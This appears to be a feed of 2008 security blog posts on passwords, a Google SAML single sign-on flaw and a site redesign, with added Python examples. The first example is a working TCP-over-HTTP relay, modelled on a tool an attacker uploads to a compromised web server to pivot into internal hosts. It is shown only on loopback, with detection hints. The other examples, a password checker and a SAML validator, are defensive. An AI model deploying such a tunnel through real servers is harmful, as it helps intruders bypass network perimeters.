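Added example, not reDuh's own code and not from the Darknet post: a miniature TCP-over-HTTP relay in Python that shows the mechanism the post describes. RelayHandler stands in for the JSP/PHP/ASP page that Bob.Hacker uploads; each open/send/recv/close operation on a TCP host behind the web server is carried in an ordinary HTTP POST, so only web traffic crosses the perimeter while the TCP connection itself is made from the web server. The "internal" host is a constructed loopback echo service that upper-cases its input, so a successful round trip proves the bytes really went through it. The hosts, ports, URL paths and session-id scheme are all assumptions for this example.

```python
import itertools
import socket
import socketserver
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler

_sessions = {}                 # session id -> socket held open on the relay host
_ids = itertools.count(1)
_lock = threading.Lock()
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxy env vars

class RelayHandler(BaseHTTPRequestHandler):
    """Stands in for the uploaded page: one HTTP POST per TCP operation."""
    def log_message(self, *args):          # keep the demo quiet
        pass

    def _reply(self, body: bytes, status: int = 200):
        self.send_response(status)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        url = urllib.parse.urlparse(self.path)
        q = urllib.parse.parse_qs(url.query)
        body = self.rfile.read(int(self.headers.get("Content-Length", "0")))
        action = url.path.strip("/")
        if action == "open":
            # Connect *from the relay host*: the target (assumed host/port supplied by
            # the client) may be reachable only from inside the web server's network.
            s = socket.create_connection((q["host"][0], int(q["port"][0])), timeout=2)
            s.settimeout(0.2)              # recv must not block the HTTP worker thread
            with _lock:
                sid = str(next(_ids))
                _sessions[sid] = s
            return self._reply(sid.encode())
        sid = q.get("id", [""])[0]
        s = _sessions.get(sid)
        if s is None:
            return self._reply(b"no such session", 404)
        if action == "send":
            s.sendall(body)
            return self._reply(b"ok")
        if action == "recv":
            try:
                data = s.recv(65536)
            except socket.timeout:
                data = b""                 # nothing pending yet; the client polls again
            return self._reply(data)
        if action == "close":
            s.close()
            with _lock:
                _sessions.pop(sid, None)
            return self._reply(b"closed")
        self._reply(b"bad action", 400)

class _ThreadedServer(socketserver.ThreadingTCPServer):
    daemon_threads = True
    allow_reuse_address = True

def start_relay() -> int:
    """Start the 'compromised web server' on a random loopback port; returns the port."""
    httpd = _ThreadedServer(("127.0.0.1", 0), RelayHandler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd.server_address[1]

def start_internal_service() -> int:
    """Constructed stand-in for an internal-only TCP service: echoes input upper-cased."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    def handle(conn):
        with conn:
            while chunk := conn.recv(4096):
                conn.sendall(chunk.upper())
    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]

def _http(relay_port: int, action: str, data: bytes = b"", **params) -> bytes:
    url = f"http://127.0.0.1:{relay_port}/{action}?{urllib.parse.urlencode(params)}"
    with _opener.open(urllib.request.Request(url, data=data, method="POST"), timeout=5) as r:
        return r.read()

def tunnel_roundtrip(relay_port: int, target_port: int, payload: bytes) -> bytes:
    """Bob.Hacker's side: open a circuit, push bytes in, poll the reply out, close."""
    sid = _http(relay_port, "open", host="127.0.0.1", port=target_port).decode()
    _http(relay_port, "send", payload, id=sid)
    out = b""
    for _ in range(25):                    # poll until the whole reply has arrived
        out += _http(relay_port, "recv", id=sid)
        if len(out) >= len(payload):
            break
    _http(relay_port, "close", id=sid)
    return out

if __name__ == "__main__":
    relay, target = start_relay(), start_internal_service()
    print(tunnel_roundtrip(relay, target, b"hello through http"))
```

A real tool presents the circuit as a local listening port and multiplexes several sessions; this version only shows the wire mechanism. On the defensive side the tell-tales are the same either way: a burst of POSTs to a single script with small opaque bodies, and a web server that suddenly opens outbound TCP connections to internal hosts it has no business reaching.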

Keys to the kingdom [Security For All]

Posted: 10 Sep 2008 12:03 AM CDT

You'd think we'd have gotten past this by now. After all the research and mathematical and technological advancement, almost all of our most valuable digital - and ultimately real - assets are protected by one little word. Usually something lame like our dog's name or favorite team mascot. That's right, I'm talking about passwords. In spite of efforts by the Payment Card Industry (PCI) Security Standards Council and others to promote multi-factor authentication - i.e. some combination of

  • something you know (like a password)
  • something you have (like an access card)
  • something you are (biometrics like fingerprints or retinal scan)

even most financial institutions can manage only a password and some personal questions (which, incidentally, is not really multi-factor but multiple single-factor, i.e. several things that you know) to authenticate us for the most sensitive and important transactions. And forget about web sites. Everybody wants you to have a password. Presumably a good - and unique - one for each.

By now most people have heard about the guidelines for good passwords. For example, Wikipedia lists the following common guidelines.

Guidelines for strong passwords

Common guidelines for choosing good passwords are designed to make passwords less easily discovered by intelligent guessing:

  • Include numbers, symbols, upper and lowercase letters in passwords
  • Password length should be around 12 to 14 characters
  • Avoid passwords based on repetition, dictionary words, letter or number sequences, usernames, or biographical information like names or dates.

I can see heads starting to spin! How in the world can I remember even one 12-14 character password that contains nothing memorable and is more or less random? Much less the 50 or so passwords I need for all my web sites and financial stuff? Yeah - that's a problem. And it's exacerbated by the fact that as the need for passwords has proliferated, the practicality (i.e. horsepower) of password crackers has improved exponentially. Oh, and by the way, to really achieve decent security (i.e. mitigate the threat of exposure) you should change your passwords at least annually and preferably more often.

Yikes! So how exactly can a person possibly memorize 50 pseudo-random character strings that all change every year? Well, in a nutshell - you can't. No one can. Well, maybe someone with an eidetic memory, but not you or me. There is, however, hope. SecurePuter has a great post on "How to Create and Remember Multiple Secure Passwords" which presents an easy-to-remember but hard-to-guess formula that lets you calculate what your password is, removing the randomness and the need to memorize many different things. It's a great idea, and be sure to read all of the comments, as further refinements are suggested.

Still, if you're like me and make an actual effort to forget things as soon as possible, this might not be an optimal solution. So how do I manage to remember 50 (or in my case more like 150) dynamic random character strings? It's easy - I don't even try. I use a password generator and storage system. There are quite a few good packages out there. The one I use is the open source package Password Safe, partly because Bruce Schneier started the project, partly because it runs on all of the platforms I use, partly because it has great encryption, but mostly because I'm cheap and it's free (as in free speech and free beer). I keep my fully encrypted Password Safe database file on a USB thumb drive so all of my passwords are available on whatever device I'm using - except my iPhone (which is a rant for another time).

Basically the way it works is that I make an entry for whatever web site or computer I need a password for and then let it generate one for me. There are all sorts of policy options, so you can get insanely long and complex passwords. When I save the new password, it is encrypted using the one and only password I need to remember. That's it. So not only do I not remember my 150 different passwords, I never knew what they were to begin with.

Now there are situations where this kind of password safe mechanism will have an issue. Specifically, you can run into a race condition with computer logons that require a regularly changing password (e.g. most corporate networks), whereby you must be able to type in the password to log in so that you can get access to the password safe. I get around this by generating a random 12-character password that I can remember for the 90 days that it will be valid. So I guess I really have to remember 2 passwords. But even I can do that. And so can you.
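Added example, not from the Security For All post, SecurePuter or Password Safe: a small Python module that turns the Wikipedia guidelines quoted above into a checker and pairs it with the kind of generator the password-safe approach relies on. guideline_violations reports which guideline a password breaks (length, character classes, repetition, letter or number sequences, dictionary words); generate_password draws uniformly from an 86-character alphabet with the secrets module and rejects draws that fail the checker; entropy_bits shows why a 14-character random password is out of reach of guessing. The alphabet, the minimum length of 12 and the tiny word list are assumptions for this example.

```python
import math
import re
import secrets
import string

SYMBOLS = "!@#$%^&*()-_=+[]{};:,.?/"
ALPHABET = string.ascii_letters + string.digits + SYMBOLS      # 86 characters (assumed policy)

# Constructed stand-in for a real dictionary plus the user's own biographical words.
TINY_WORDLIST = {"password", "welcome", "summer", "rover", "yankees", "qwerty"}

def guideline_violations(pw: str, wordlist=TINY_WORDLIST) -> list:
    """Return the guideline tags a password breaks; an empty list means it passes."""
    problems = []
    if len(pw) < 12:                                    # "around 12 to 14": treat 12 as the floor
        problems.append("too_short")
    for tag, chars in (("no_upper", string.ascii_uppercase), ("no_lower", string.ascii_lowercase),
                       ("no_digit", string.digits), ("no_symbol", SYMBOLS)):
        if not any(c in chars for c in pw):
            problems.append(tag)
    if re.search(r"(.)\1\1", pw):                       # aaa, 111, ...
        problems.append("repetition")
    low = pw.lower()
    if any(ord(low[i + 1]) - ord(low[i]) == d and ord(low[i + 2]) - ord(low[i + 1]) == d
           and low[i:i + 3].isalnum()                   # abc, 321, ... (letters or digits only)
           for i in range(len(low) - 2) for d in (1, -1)):
        problems.append("sequence")
    if any(w in low for w in wordlist if len(w) >= 4):
        problems.append("dictionary_word")
    return problems

def generate_password(length: int = 14) -> str:
    """Uniform draw from ALPHABET via secrets (not random), resampled until it passes."""
    if length < 12:
        raise ValueError("guideline minimum is 12 characters")
    for _ in range(1000):                               # rejection keeps the draw uniform
        pw = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if not guideline_violations(pw):
            return pw
    raise RuntimeError("no compliant password found")

def entropy_bits(length: int, alphabet: str = ALPHABET) -> float:
    """Bits of entropy of a uniform draw (rejection above removes only a sliver of the space)."""
    return length * math.log2(len(alphabet))

if __name__ == "__main__":
    print(guideline_violations("password1234"))
    print(generate_password(14), round(entropy_bits(14), 1), "bits")
```

The checker is what a site or safe should run before accepting a human-chosen password; the generator is what makes the checker irrelevant, since a uniform 14-character draw from 86 symbols carries about 90 bits and the "cracker horsepower" argument in the post no longer applies.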

Google SAML Single Sign on vulnerability [Sicurezza Informatica Made in Italy]

Posted: 09 Sep 2008 06:32 PM CDT

I would like to point out the following paper, the result of research by the University of Genoa, Universidad de Castilla-La Mancha, SAP and Siemens.

The research was brought to my attention by the very kind Luca Compagna, whom I had the pleasure of helping to publicise it.

The vulnerability found in the Google Apps Single Sign-On service, which is based on the OASIS SAML 2.0 architecture, has a considerable impact beyond the name involved (Google).

It is an example of how an authentication architecture based on an internationally recognised de facto standard can still present vulnerabilities because of its (incorrect) implementation.
(Image copyright: Clareity Consulting)

Google's Single Sign-On, being based on SAML, allows a single authentication to grant access to different services belonging to different administrative domains (so not only within a single organisation). The basic concepts are, to put it simply, those of Kerberos, from which SAML inherits some characteristics while introducing others and adapting to the web environment through the use of XML.

The advisory is available here
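Added example, not code from the paper, the advisory or Google: the post does not reproduce the advisory's details, so this shows the general service-provider-side checks that the SAML 2.0 Web Browser SSO profile expects before a bearer assertion is trusted, which are exactly the checks that keep an assertion issued for one service provider from being accepted by another: issuer, one-time assertion ID, validity window, an AudienceRestriction naming this SP, and SubjectConfirmationData whose Recipient is our ACS URL and whose InResponseTo matches a request we sent. The sample assertion, issuer, entity IDs, URLs and identifiers are constructed assumptions; XML signature verification is assumed to have been done by the caller beforehand, and SP-initiated SSO (so an InResponseTo is present) is assumed.

```python
from datetime import datetime, timezone
import xml.etree.ElementTree as ET

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"
NS = {"saml": SAML_NS}

# Constructed sample assertion (not a captured Google Apps message); issuer, SP entity
# ID, ACS URL and the request/assertion IDs are assumptions for this example.
SAMPLE_ASSERTION = f"""<saml:Assertion xmlns:saml="{SAML_NS}" Version="2.0"
    ID="_assertion-0001" IssueInstant="2008-09-09T18:00:00Z">
  <saml:Issuer>https://idp.example.org</saml:Issuer>
  <saml:Subject>
    <saml:NameID>alice@example.org</saml:NameID>
    <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
      <saml:SubjectConfirmationData InResponseTo="_req-42"
          NotOnOrAfter="2008-09-09T18:05:00Z"
          Recipient="https://sp.example.com/acs"/>
    </saml:SubjectConfirmation>
  </saml:Subject>
  <saml:Conditions NotBefore="2008-09-09T17:59:00Z" NotOnOrAfter="2008-09-09T18:05:00Z">
    <saml:AudienceRestriction>
      <saml:Audience>https://sp.example.com</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>
</saml:Assertion>"""

def parse_ts(value: str) -> datetime:
    """SAML timestamps are UTC xs:dateTime values; this handles the whole-second form."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def validate_assertion(xml_text: str, *, expected_issuer: str, sp_entity_id: str, acs_url: str,
                       outstanding_request_ids: set, now: datetime, seen_ids: set) -> list:
    """Binding checks an SP makes on a signature-verified bearer assertion.

    Returns the names of the failed checks; an empty list means the SP may accept it.
    """
    root = ET.fromstring(xml_text)
    problems = []
    # 1. Only our configured IdP may have issued it.
    if (root.findtext("saml:Issuer", namespaces=NS) or "").strip() != expected_issuer:
        problems.append("issuer")
    # 2. Each assertion ID is accepted once; a second presentation is a replay.
    aid = root.get("ID")
    if not aid or aid in seen_ids:
        problems.append("replay")
    # 3. Validity window on the Conditions element.
    cond = root.find("saml:Conditions", NS)
    nb, na = (cond.get("NotBefore"), cond.get("NotOnOrAfter")) if cond is not None else (None, None)
    if na is None or now >= parse_ts(na) or (nb is not None and now < parse_ts(nb)):
        problems.append("validity_window")
    # 4. Audience: the assertion must name *this* SP, so one issued to another SP is useless here.
    audiences = [a.text.strip() for a in
                 root.findall("saml:Conditions/saml:AudienceRestriction/saml:Audience", NS) if a.text]
    if sp_entity_id not in audiences:
        problems.append("audience")
    # 5. Bearer confirmation: delivered to our ACS, answering a request we sent, still valid.
    scd = root.find("saml:Subject/saml:SubjectConfirmation/saml:SubjectConfirmationData", NS)
    if scd is None:
        problems.append("subject_confirmation")
    else:
        if scd.get("Recipient") != acs_url:
            problems.append("recipient")
        if scd.get("InResponseTo") not in outstanding_request_ids:
            problems.append("in_response_to")
        bearer_na = scd.get("NotOnOrAfter")
        if bearer_na is None or now >= parse_ts(bearer_na):
            problems.append("bearer_expired")
    if not problems:
        seen_ids.add(aid)            # remember only assertions we actually accepted
    return problems

if __name__ == "__main__":
    print(validate_assertion(SAMPLE_ASSERTION, expected_issuer="https://idp.example.org",
                             sp_entity_id="https://sp.example.com", acs_url="https://sp.example.com/acs",
                             outstanding_request_ids={"_req-42"},
                             now=parse_ts("2008-09-09T18:01:00Z"), seen_ids=set()))
```

The point of the audience and recipient checks is that the assertion is bound to one service provider; an implementation that skips them, or an identity provider that omits the fields, turns a per-SP credential into one that any SP the user has logged in to could present elsewhere, which is the kind of implementation-level flaw the post is warning about.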

New Look Coming Soon [Ascension Blog]

Posted: 09 Sep 2008 11:40 AM CDT

We are pleased to announce that there will soon be a new look for the Ascension Risk Management Website.  We engaged the services of a graphic artist to come up with a logo.  This artist also came up with a very nice, simple and straightforward website design for us.   We are going through the final design and content reviews now and hope to have the site up and online within the next two weeks.  (Our blog design will stay the same.)  In the meantime I thought that I'd share with you the new logo. 

